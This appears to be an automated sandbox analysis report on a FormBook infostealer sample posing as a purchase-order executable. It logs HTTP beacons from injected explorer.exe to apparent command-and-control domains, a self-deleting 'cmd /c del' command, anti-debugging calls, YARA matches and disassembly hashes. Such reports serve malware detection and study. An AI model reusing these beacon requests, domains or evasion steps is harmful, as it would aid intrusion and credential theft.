May 12, 2021 14:44:50.021295071 CEST	6281	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 12 May 2021 12:44:49 GMT Content-Type: text/html Content-Length: 275 ETag: "609953af-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49753	66.235.200.147	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 14:45:00.805551052 CEST	6282	OUT	GET /meub/?5jYHTPD=wcKMzz9mAcCi2aLb0t1qtV86GlMNvZH+VyhKA1jT/I4bq+nb0/na/dj3wGs+8qrOUrJA87J5aQ==&W2MTZ=5jyDHn6x2rY HTTP/1.1 Host: www.bridgestreetresources.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49754	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 14:45:11.886488914 CEST	6284	OUT	GET /meub/?5jYHTPD=IF6wwdQ2GC/v5+zeo737nU5N5nLUvdsVBqkfZ3TmK32/J3TLHA8Ym95CSjw9+1sG86DK55WYOQ==&W2MTZ=5jyDHn6x2rY HTTP/1.1 Host: www.shadyshainarae.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 14:45:12.023557901 CEST	6284	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 12 May 2021 12:45:11 GMT Content-Type: text/html Content-Length: 275 ETag: "6096ba97-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: PO 367628usa.exe PID: 6596 Parent PID: 5928

General

Start time:	14:43:06
Start date:	12/05/2021
Path:	C:\Users\user\Desktop\PO 367628usa.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\PO 367628usa.exe'
Imagebase:	0x4b0000
File size:	846336 bytes
MD5 hash:	42CF4C3943D5A839412A16A4D8B8D65D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: PO 367628usa.exe PID: 6692 Parent PID: 6596

General

Start time:	14:43:13
Start date:	12/05/2021
Path:	C:\Users\user\Desktop\PO 367628usa.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\PO 367628usa.exe
Imagebase:	0x10000
File size:	846336 bytes
MD5 hash:	42CF4C3943D5A839412A16A4D8B8D65D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: PO 367628usa.exe PID: 6700 Parent PID: 6596

General

Start time:	14:43:14
Start date:	12/05/2021
Path:	C:\Users\user\Desktop\PO 367628usa.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\PO 367628usa.exe
Imagebase:	0x330000
File size:	846336 bytes
MD5 hash:	42CF4C3943D5A839412A16A4D8B8D65D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: PO 367628usa.exe PID: 6716 Parent PID: 6596

General

Start time:	14:43:14
Start date:	12/05/2021
Path:	C:\Users\user\Desktop\PO 367628usa.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\PO 367628usa.exe
Imagebase:	0x340000
File size:	846336 bytes
MD5 hash:	42CF4C3943D5A839412A16A4D8B8D65D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: PO 367628usa.exe PID: 6724 Parent PID: 6596

General

Start time:	14:43:15
Start date:	12/05/2021
Path:	C:\Users\user\Desktop\PO 367628usa.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\PO 367628usa.exe
Imagebase:	0xdc0000
File size:	846336 bytes
MD5 hash:	42CF4C3943D5A839412A16A4D8B8D65D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3440 Parent PID: 6724

General

Start time:	14:43:20
Start date:	12/05/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6f22f0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: raserver.exe PID: 7104 Parent PID: 3440

General

Start time:	14:43:32
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\raserver.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\raserver.exe
Imagebase:	0x950000
File size:	108544 bytes
MD5 hash:	2AADF65E395BFBD0D9B71D7279C8B5EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 5544 Parent PID: 7104

General

Start time:	14:43:37
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\PO 367628usa.exe'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5804 Parent PID: 5544

General

Start time:	14:43:37
Start date:	12/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: PO 367628usa.exe PID: 6596 Parent PID: 5928 PO 367628usa.exeCOMMON

Executed Functions

Function 00DD1658, Relevance: 1.7, APIs: 1, Instructions: 166COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00DD1784

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 5a195064cf138cbbeaf67ccbf744bc622b2eebf8477c0224a75486524e58f213
Instruction ID: 449fd121a967bb57e929b9133be88b06e8759891c1e0256026d9b4a97b93c8c7
Opcode Fuzzy Hash: 5a195064cf138cbbeaf67ccbf744bc622b2eebf8477c0224a75486524e58f213
Instruction Fuzzy Hash: A5516975C096899FCB01CFA4D4986DDBFF0EF0A320F19849AD484AB261D7389949CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DD455B, Relevance: 1.6, Strings: 1, Instructions: 372COMMON

Download Yara Rule

Strings

.[`, xrefs: 00DD47D1

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID:
String ID: .[`
API String ID: 0-1758966101
Opcode ID: b61e7ece5110a24d066b7bab58903c9dfd8861fa024734f8e0e6797085c6a972
Instruction ID: 362e543e67f7f727ee0b9af41a410ed1fd800e05e9e1d6e0bf18c171cf2aa3cd
Opcode Fuzzy Hash: b61e7ece5110a24d066b7bab58903c9dfd8861fa024734f8e0e6797085c6a972
Instruction Fuzzy Hash: 79E16B7490520ADFCB04CF99C8844AEFBB2FF4A341B25C596C452AB365D734EA46CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DD16E8, Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00DD1784

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: dc76ef91a95190fb34daf5999d859cf14be5603ff522ecd4a69726cd637737d8
Instruction ID: 083d2138966eb7ef245c057af85d105aeb9c9f6c204fb3431fbfd160a47e8230
Opcode Fuzzy Hash: dc76ef91a95190fb34daf5999d859cf14be5603ff522ecd4a69726cd637737d8
Instruction Fuzzy Hash: 0A41A9B9D05258DFCB00CFA9D484AEEFBF4BB09314F14906AE414B7250D738AA89CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00DD45B7, Relevance: 1.6, Strings: 1, Instructions: 338COMMON

Download Yara Rule

Strings

.[`, xrefs: 00DD47D1

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID:
String ID: .[`
API String ID: 0-1758966101
Opcode ID: 48299f54460bcb52e3557a936b1fa354324b699f99c0a4f8aa3b18b85dc4a29f
Instruction ID: 394acfe01295a4ea1d6af8fdfcb40234d3c2839f5db67e5e8c268d7804109fd5
Opcode Fuzzy Hash: 48299f54460bcb52e3557a936b1fa354324b699f99c0a4f8aa3b18b85dc4a29f
Instruction Fuzzy Hash: 7FE13A7490520ADFCB04CF9AC4844AEFBB2FF8A341B25C556D456AB325D734DA42CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DD4620, Relevance: 1.6, Strings: 1, Instructions: 302COMMON

Download Yara Rule

Strings

.[`, xrefs: 00DD47D1

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID:
String ID: .[`
API String ID: 0-1758966101
Opcode ID: 65943175d0a39f6e44a31a84d32e29930b9bce663e41e1e3727ae789104d5cc3
Instruction ID: 6a8992a7ab1d3a3fa3102dc6f043e8e0d692ee887963d9f64399ed10a5bd8dff
Opcode Fuzzy Hash: 65943175d0a39f6e44a31a84d32e29930b9bce663e41e1e3727ae789104d5cc3
Instruction Fuzzy Hash: A0D1F57490520ADFCB04CF9AC4808AEFBB2FF8A341B25D556D556AB324D734DA42CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00DD2499, Relevance: 1.5, Strings: 1, Instructions: 258COMMON

Download Yara Rule

Strings

s9, xrefs: 00DD2658

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID:
String ID: s9
API String ID: 0-1221504785
Opcode ID: c09547efe32443fc35041405c42de7c970fe306f95b6d61f9be411cd67999a0b
Instruction ID: f0919636236c05305282c0cbbc53c832ca9272901f99a93db7173da873938719
Opcode Fuzzy Hash: c09547efe32443fc35041405c42de7c970fe306f95b6d61f9be411cd67999a0b
Instruction Fuzzy Hash: C7B14874E042498FCB05CFE9D894AEDBFB2EF9A310F24806AD455AB365D7309906CF64

Uniqueness

Uniqueness Score: -1.00%

Function 054E58D3, Relevance: 1.5, Strings: 1, Instructions: 218COMMON

Download Yara Rule

Strings

u7@-, xrefs: 054E5B98

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID: u7@-
API String ID: 0-3911675863
Opcode ID: e358aec619f3a3366616c60d4284f30d75d553e08c779f1db9b99a86973bfd10
Instruction ID: 6362e3fe5b45011b5e3a307bb3477b84f4de3f327c4e0200e0b7b394bff05236
Opcode Fuzzy Hash: e358aec619f3a3366616c60d4284f30d75d553e08c779f1db9b99a86973bfd10
Instruction Fuzzy Hash: 4F91E274E04218DFCB08CFA9D8849EEBBB2FF89315F10846AD415AB364DB349902CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00DD2520, Relevance: 1.5, Strings: 1, Instructions: 207COMMON

Download Yara Rule

Strings

s9, xrefs: 00DD2658

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID:
String ID: s9
API String ID: 0-1221504785
Opcode ID: ad93ce01cbf3d46db556ae2cd0235aca8e79f73bc8cffa6c502a93458c76cdef
Instruction ID: 83be05e61e6cd841a6624dae8a0910287e5146a421025087059f3de0cf871b4f
Opcode Fuzzy Hash: ad93ce01cbf3d46db556ae2cd0235aca8e79f73bc8cffa6c502a93458c76cdef
Instruction Fuzzy Hash: 6491D774E002198FCB08CFE9D984AADFBB2EF99310F24902AD416BB354D7319945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 054E3C48, Relevance: .8, Instructions: 782COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89d995f0c2b83fdf16d95e392caf1e0ba2530925d0d64d44f231071ced311395
Instruction ID: a590ca7ab1ea8ad1f5870ac523b374fbacd2d995f4a500ff74f87362d5c1afb8
Opcode Fuzzy Hash: 89d995f0c2b83fdf16d95e392caf1e0ba2530925d0d64d44f231071ced311395
Instruction Fuzzy Hash: 60625E31A04209DFCF15CF68C984AEEBBB2BF88305F158596E505AB3A1D770ED51CB61

Uniqueness

Uniqueness Score: -1.00%

Function 054E0040, Relevance: .6, Instructions: 565COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92f80b3c67a71625874114ff7e96b28607f4dd16d8f93e870f6d0261611a02f3
Instruction ID: 09ff48056bfe7499ef4f6a1fff7b552b44aa97ccc34898498ea7787c47af9ccb
Opcode Fuzzy Hash: 92f80b3c67a71625874114ff7e96b28607f4dd16d8f93e870f6d0261611a02f3
Instruction Fuzzy Hash: 22227E70A042098FCB14DF68C858BAEBBB6FF88305F148469E519DB395DB74DD42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 054E5E24, Relevance: .6, Instructions: 560COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e80902bf79f81525a67219dc5c33372fa43e038643c1b96f3709faa8c930b028
Instruction ID: 387810c783539b6e89d8ab6ea849640c44af275d4376ae2b32f3aae01d3bfe4e
Opcode Fuzzy Hash: e80902bf79f81525a67219dc5c33372fa43e038643c1b96f3709faa8c930b028
Instruction Fuzzy Hash: 4D227C74E01219CFCB18CFA9D9446EEFBB3FF88315F20856AD509AB354DB3599428B50

Uniqueness

Uniqueness Score: -1.00%

Function 054E07B8, Relevance: .3, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7112ec023817b1fcf6d51396a2fceb6eedf749d5f8f5e6bdbc21ad20249729a
Instruction ID: 6a1d0af6cb24637880d5c0f17d6a1d70107d12e82fac4448072345baca0475c5
Opcode Fuzzy Hash: a7112ec023817b1fcf6d51396a2fceb6eedf749d5f8f5e6bdbc21ad20249729a
Instruction Fuzzy Hash: 80D1FC70A04109DFCB14CF99C989AEEBBB2FF58305F15809AE469AB365D770DD41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 054E6508, Relevance: .3, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9efcff27b8d924fc5576f781530d70e7b51d8abd793405c1223d573ec8f70605
Instruction ID: 3cfcac5d7695ef0d296545225309904ba510ffde7bfe25c273f7f594b5bf4851
Opcode Fuzzy Hash: 9efcff27b8d924fc5576f781530d70e7b51d8abd793405c1223d573ec8f70605
Instruction Fuzzy Hash: 38C12774E052098BDB04CFE9E5845EEFBF2BF98311F25D52AC414BB258E73099428F65

Uniqueness

Uniqueness Score: -1.00%

Function 054E64FB, Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f85e5ae4d630a2cbbc8da00f76e7e05240a7e89ac7862e46e1ef293ff7209bc
Instruction ID: 3d358b7e43562cc06f54ffeb36fac029815fd47132acce65b2d0cdf02f546ebb
Opcode Fuzzy Hash: 4f85e5ae4d630a2cbbc8da00f76e7e05240a7e89ac7862e46e1ef293ff7209bc
Instruction Fuzzy Hash: 77C12674E042098BDB04CFE9E5845EEFBF2BF98311F25D42AC415EB258E73499428F65

Uniqueness

Uniqueness Score: -1.00%

Function 00DDB7E0, Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aefd52fba9d603b506e8905e1a2afc0c41e8662af9b066d8a9744a4416ad82ac
Instruction ID: 3508d9d12153fec1461949192357e4be052a873e64c0be14f74d2b2c14150108
Opcode Fuzzy Hash: aefd52fba9d603b506e8905e1a2afc0c41e8662af9b066d8a9744a4416ad82ac
Instruction Fuzzy Hash: C2C11370D05258CFDB24DFA4C980AADBBB6BF89318F21856BC04ABB354DB349941DF64

Uniqueness

Uniqueness Score: -1.00%

Function 054E9183, Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4addc357e09c7bdda582ac92429b991bcf520dd537eaccb1cff16eb9fb1d8c09
Instruction ID: bc8dd60b6d08c154c4d80b3a976992ea1088538070a079048b5cc4904b44dcd4
Opcode Fuzzy Hash: 4addc357e09c7bdda582ac92429b991bcf520dd537eaccb1cff16eb9fb1d8c09
Instruction Fuzzy Hash: 7AA10575E106199FCB08CFA9C891AEEFBF2FF89301F54846AD415AB394D7309942CB61

Uniqueness

Uniqueness Score: -1.00%

Function 054E9208, Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7a65d98499351a0e13c9fd91bf7262e3b06532d030acb4a214586dfd71eb333
Instruction ID: e2f9f5b0049d86105dfedd4400e712a4fa14ad2f7dc1ae5dfc7cbdffde05c95c
Opcode Fuzzy Hash: f7a65d98499351a0e13c9fd91bf7262e3b06532d030acb4a214586dfd71eb333
Instruction Fuzzy Hash: F681C274E112199FDB08CFE9C8846EEBBB2FF89301F14842AD515AB364DB309946CF64

Uniqueness

Uniqueness Score: -1.00%

Function 054E5C00, Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56c02e30c9a13c21042285c84d47e78f93b9585925002d723e2c761e88cdf9a5
Instruction ID: 203c913653d747f59e33ae3c8bc7d42e39c29be75e7fffab429cb174a4616ceb
Opcode Fuzzy Hash: 56c02e30c9a13c21042285c84d47e78f93b9585925002d723e2c761e88cdf9a5
Instruction Fuzzy Hash: 4D512A74E052099FCB08CFA9D555AEEBBB3FF89305F20842AD505BB354DB319942CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00DD2DB0, Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f15f73457a1deb55d6bd09556779c785cc5335e9ed6f3ac60ebedbae1bdabc9b
Instruction ID: 55250293a6fc57bebc8dd9cb5d6412e3c28765baaa2fb896cc4d04d3a4f3d801
Opcode Fuzzy Hash: f15f73457a1deb55d6bd09556779c785cc5335e9ed6f3ac60ebedbae1bdabc9b
Instruction Fuzzy Hash: 0851E674D05209DFCB08CFAAD9406AEFBF2EF99300F24D46AE459A7354D7349A418FA4

Uniqueness

Uniqueness Score: -1.00%

Function 054E5BF0, Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e81383740287b60b8001ac55e5815d2e2eef002c79e3d298d0634820d65a41b
Instruction ID: ee397d2713f8a5a537eec4943b4468fb24cfd5b8806ab9f06ed39aba189b5e63
Opcode Fuzzy Hash: 9e81383740287b60b8001ac55e5815d2e2eef002c79e3d298d0634820d65a41b
Instruction Fuzzy Hash: 9A512874E012099FCB08CFA9D595AEEBBB3FF88305F24842AD505B7354DB319A42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 054E9A30, Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e153e75d7d443e111429e24c933c6fb63862d956b2c662bc22e1df5b205470c
Instruction ID: 7b2c5b7fc361c324af21d0ce3bf3af850b9a3ce1f3d3062af8fce48631dd29f2
Opcode Fuzzy Hash: 1e153e75d7d443e111429e24c933c6fb63862d956b2c662bc22e1df5b205470c
Instruction Fuzzy Hash: A35124B4E042599FCB08CFAAC9456EEFBF2FF89301F18C16AD419A7291D7344942CB64

Uniqueness

Uniqueness Score: -1.00%

Function 05C6B648, Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1602f1b22b417e3c80db131564ed9a39d1241fbb0c39bcca47a5c4fd16453139
Instruction ID: 15ee6efbb7f705d1a48b3c6b25c0d13d6d35cc35a2992f3ecbc650c4106cc48e
Opcode Fuzzy Hash: 1602f1b22b417e3c80db131564ed9a39d1241fbb0c39bcca47a5c4fd16453139
Instruction Fuzzy Hash: 84417D70E15219DFDB08CFA6D581AEDFBB2BB89304F14A82AD505F7250D7748A00CF29

Uniqueness

Uniqueness Score: -1.00%

Function 054E8620, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

